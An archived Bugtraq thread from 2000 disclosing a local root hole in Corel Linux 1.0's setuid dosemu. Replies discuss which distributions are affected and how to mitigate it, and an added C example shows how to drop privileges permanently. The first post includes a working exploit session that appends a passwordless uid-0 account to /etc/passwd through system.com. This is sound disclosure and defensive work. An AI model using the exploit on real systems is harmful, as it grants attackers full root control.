4861012 2000-03-03 18:52 /100 lines/ Postmaster
Recipient: Bugtraq (import) <10093>
Subject: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Message-ID: <200003020436.PAA20168@jawa.chilli.net.au>
Date: Tue, 2 Mar 0100 04:47:11 +0000
Reply-To: suid@SUID.KG
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: suid@SUID.KG
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

Re all,

Hadn't seen this one around yet, has been on my site for about a week now.
Corel's mailserver bounced me about this IIRC? What's up Corel?

Cheers.

----------------------------
suid@suid.kg - Corel Linux dosemu config error. Local root compromise.

Software:  Corel Linux 1.0 dosemu distribution configuration
URL:       http://linux.corel.com
Version:   Version 1.0
Platforms: Corel Linux only.
Type:      Default misconfiguration. No one reads README anymore??

Summary:

Local users can take advantage of a packaging and configuration error
(which has been known and documented for a long time) to execute
arbitrary commands as root.

We see from the doc/README/SECURITY file as well as
http://www.dosemu.org/docs/README/0.98/README-3.html written in 1997
that this configuration is bad.

Vulnerability:

The system.com command is available to any user who runs the dos
emulator. This is a direct violation of the advice from the SECURITY
readme file:

    Never allow the 'system.com' command (part of dosemu) to be
    executed. It makes dosemu execute the libc 'system()' function.
    Though privileges are turned off, the process inherits the switched
    uid-setting (uid=root, euid=user), hence the unix process can use
    setreuid to gain root access back.

... the rest you can imagine yourself.
Exploit:

This is a script log which details how to reproduce this:

Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PATH:."
nebula:~$ dos
CPU speed set to 430/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
[ snip bunch of dosemu crap ]
"Welcome to dosemu 0.98!
C:\> system hack-corel;
sh: : command not found
C:\> exit
ERROR: general protection at 0x3f0ff: 0
ERROR: SIGSEGV, protected insn...exiting!
nebula:~$ tail -1 /etc/passwd
owned::0:0::/:/bin/bash
nebula:~$ su owned
nebula:/home/suid# id
uid=0(root) gid=0(root) groups=0(root)
nebula:/home/suid# exit
exit
nebula:~$ exit
Script done on Fri Feb 25 13:55:27 2000

Note: This is not a vulnerability in dosemu itself. The documentation
warns users very specifically that this will happen if the system is
configured as such.

Greets: duke cr active
(4861012) ------------------------------------------(Re-wrapped)

4870140 2000-03-07 08:14 /66 lines/ Postmaster
Recipient: Bugtraq (import) <10116>
Subject: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1
        protocol="application/pgp-signature"; boundary="vOmOzSkFvhd7u8Ms"
X-Sender: whitevampire@mindless.com
X-Disclaimer: If you dislike what I say, you do not have to read it. Deal.
X-Copyright: Applicable parts of this eMail (c) 2000 WHiTe VaMPiRe Project Gamma.
X-GammaForce: The Gamma Force is strong with this one (irc.gammaforce.org/www.gammaforce.org)
X-PGP: Public PGP key is available at http://projectgamma.com/archives/files/pgp.asc (ID: 0x7103CA5F)
Message-ID: <20000303025417.C1413@nirvana.projectgamma.com>
Date: Fri, 3 Mar 2000 02:54:17 -0500
Reply-To: whitevampire@mindless.com
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: "VaMPiRe, WHiTe" <whitvamp@mindless.com>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200003020436.PAA20168@jawa.chilli.net.au>; from suid@SUID.KG on Thu, Mar 02, 2000 at 04:47:11AM +0000

--vOmOzSkFvhd7u8Ms
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

On Thu, Mar 02, 2000 at 04:47:11AM +0000, suid@SUID.KG(suid@SUID.KG) wrote:
<snip>
: Summary:
:
: Local users can take advantage of a packaging and configuration
: error (which has been known and documented for a long time) to
: execute arbitrary commands as root.
:
: We see from the doc/README/SECURITY file as well as
: http://www.dosemu.org/docs/README/0.98/README-3.html
: written in 1997 that this configuration is bad.
<snip>

Tested default configuration of dosemu on Slackware 7.0, no vulnerability.

Regards,
--
   __  ______  ____
  /  \/      \ \  /    WHiTe VaMPiRe\Rem
  \ \/\/ /\ Y  /       whitevampire@mindless.com
   \    /  \  /        http://www.projectgamma.com/
    \__/\ / \___/      http://www.gammaforce.org/
         \/
"Silly hacker, root is for administrators."
--vOmOzSkFvhd7u8Ms
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1

iQA/AwUBOL9vp9/q8ZpxA8pfEQKkdwCgwh68tX6NWe21l9JLkhIb3JEtAn4AnAtR
Frbg9nvoZiReJxpso6qhQu2w
=D8oK
-----END PGP SIGNATURE-----

--vOmOzSkFvhd7u8Ms--
(4870140) ------------------------------------------(Re-wrapped)

4871005 2000-03-07 10:56 /36 lines/ Postmaster
Recipient: Bugtraq (import) <10134>
Subject: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14530.56345.699613.823666@mercury.st.hmc.edu>
Date: Sun, 5 Mar 2000 14:13:45 -0800
Reply-To: Nate Eldredge <neldredge@HMC.EDU>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Nate Eldredge <neldredge@HMC.EDU>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

I note that this has been added to the Vulnerabilities Database on
www.securityfocus.org (#1030) with the following solution:

> The system.com program should be removed from the dosemu hierarchy.

I don't think this is adequate. system.com is a fairly short file (300
bytes), and if a user has any way to create files inside the dosemu
hierarchy (as they probably do, because otherwise dosemu is of limited
value), they can easily re-create it.

Correct fixes are listed at
http://www.dosemu.org/docs/README/0.98/README-3.html , the URL
referenced before. Such as setting secure mode in the configuration
files. (Note that I haven't tested this as I can't reproduce the
vulnerability with my current dosemu configuration.)
--
Nate Eldredge
neldredge@hmc.edu
(4871005) ------------------------------------------

4871100 2000-03-07 11:09 /44 lines/ Postmaster
Recipient: Bugtraq (import) <10135>
Subject: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <20000304165521.1EC.0@bobanek.nowhere.cz>
Date: Sat, 4 Mar 2000 18:11:30 +0100
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <200003020436.PAA20168@jawa.chilli.net.au>

On Tue, 2 Mar 100 suid@SUID.KG wrote:

> Local users can take advantage of a packaging and configuration
> error (which has been known and documented for a long time) to
> execute arbitrary commands as root.

I cannot speak for DOSEMU developers but it is my impression you are
supposed to know what you are doing, what risk you accept (and the risk
is far from negligible), and the ways the risk can be mitigated ("secure
on", "dpmi off" (*), /etc/dosemu/users) if you install DOSEMU setuid
root, and that installing it in this way by default in the name of
user-friendliness or whatever is a VERY BAD THING. Whether the package
includes the system.com binary or not is irrelevant (**).

Yes, I know Corel is not the only vendor who is guilty--even if we limit
ourselves to Linux distros (in fact, the package in question is probably
an unmodified Debian package).
(*) I wonder whether newer versions of doc/README/SECURITY mention that
(at least according to what I heard from Hans Lermen) DPMI programs can
invoke Linux syscalls directly and circumvent any walls DOSEMU itself
raised to protect itself (unless some incredibly creative protection was
invented since version 0.97).

(**) As long as a user can make the virtual machine execute arbitrary
code (I'd like to see a useful installation making this impossible), he
can create and run his own program calling the problematic subfunction
of interrupt 0xE6 (or doing other nasty things).

--Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
(4871100) ------------------------------------------(Re-wrapped)

4875262 2000-03-08 10:06 /16 lines/ The Mail Carrier (which is implemented in) Python
Recipient: Bugtraq (import) <10150>
Subject: Re: Corel Linux 1.0 dosemu default configuration: Local root vuln
------------------------------------------------------------
On Fri, Mar 03, 2000 at 10:33:51AM -0800, Seth R Arnold wrote:
> I tested this on debian's dosemu, Version: 0.98.8-2, (debian woody) and

And more importantly, Debian potato, which will be released soon, also has
the 0.98.8-2 version. The difference is simply that the actual Debian
package is NOT installed setuid. Thus the exploit simply does not work
anymore.

Michael
--
Michael Meskes                        | Go SF 49ers!
Th.-Heuss-Str. 61, D-41812 Erkelenz   | Go Rhein Fire!
Tel.: (+49) 2431/72651                | Use Debian GNU/Linux!
Email: Michael@Fam-Meskes.De          | Use PostgreSQL!
(4875262) ------------------------------------------(Re-wrapped)
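The mechanism the first post quotes from the dosemu SECURITY file (effective uid switched to the user while the real uid stays root, so a helper started through system() can call setreuid to get root back) is the general temporary-versus-permanent privilege-drop problem that the later replies' mitigations (secure mode, or not installing the binary setuid at all) are working around. The following C program is an added example for this thread, not code from the posts or from dosemu. It contrasts the two drop patterns and verifies the permanent one by reading the uids back with getresuid. Function names, the constructed uid/gid 1000, and the assumption of a Linux/glibc target are this example's own.

```c
/* Added example, not from the Bugtraq thread or from dosemu: contrasts the
 * temporary privilege drop the first post describes (only the effective uid
 * switched, real uid still root) with a permanent drop that a child started
 * via system() cannot undo. Assumes Linux/glibc; all names are this
 * example's own. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE            /* setresuid/getresuid live behind this in <unistd.h> */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Explicit prototypes in case <unistd.h> was already included without
 * _GNU_SOURCE; these match the glibc signatures. */
extern int setresuid(uid_t ruid, uid_t euid, uid_t suid);
extern int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
extern int getresuid(uid_t *ruid, uid_t *euid, uid_t *suid);

/* Decision rule, kept apart from the syscalls so it can be checked on any
 * uid triple: privileges are gone for good only when the real, effective
 * AND saved uid all equal the unprivileged target. The state the SECURITY
 * file describes, (ruid=0, euid=user, suid=0), fails this rule because a
 * later setreuid(0, 0) still succeeds. */
int uids_fully_dropped(uid_t ruid, uid_t euid, uid_t suid, uid_t target)
{
    return target != 0 && ruid == target && euid == target && suid == target;
}

/* The dosemu pattern: switch only the effective uid. Real and saved uid
 * remain 0, so any process spawned afterwards can regain root. Listed to
 * name the anti-pattern; never call system() after only this. */
int drop_temporarily(uid_t user)
{
    return seteuid(user);
}

/* Permanent drop. Groups first, because once the uid is no longer 0 the
 * process may not change its gids any more. Then set all three uids and
 * read them back rather than trusting the return value alone. */
int drop_permanently(uid_t user, gid_t group)
{
    uid_t r, e, s;

    if (setresgid(group, group, group) != 0)
        return -1;
    if (setresuid(user, user, user) != 0)
        return -1;
    if (getresuid(&r, &e, &s) != 0)
        return -1;
    return uids_fully_dropped(r, e, s, user) ? 0 : -1;
}

/* 1 if the calling process still holds root in its real or saved uid (so a
 * child could get it back), 0 if not, -1 on error. */
int process_can_regain_root(void)
{
    uid_t r, e, s;

    if (getresuid(&r, &e, &s) != 0)
        return -1;
    return (r == 0 || s == 0) ? 1 : 0;
}

int main(void)
{
    uid_t target_uid = 1000;       /* constructed: an ordinary user account */
    gid_t target_gid = 1000;

    if (geteuid() != 0) {
        /* Unprivileged run: dropping to our own ids must still verify. */
        target_uid = getuid();
        target_gid = getgid();
    }
    printf("before: can regain root = %d\n", process_can_regain_root());
    if (drop_permanently(target_uid, target_gid) != 0) {
        perror("drop_permanently");
        return 1;
    }
    printf("after:  can regain root = %d\n", process_can_regain_root());
    return 0;
}
```

Run as root in a throwaway VM it prints 1 then 0; run as an ordinary user it prints 0 twice, since there was never any root to give back. The point for a setuid helper like the one discussed here is the read-back in drop_permanently: a return value of 0 from the set call is not proof that the saved uid went with it.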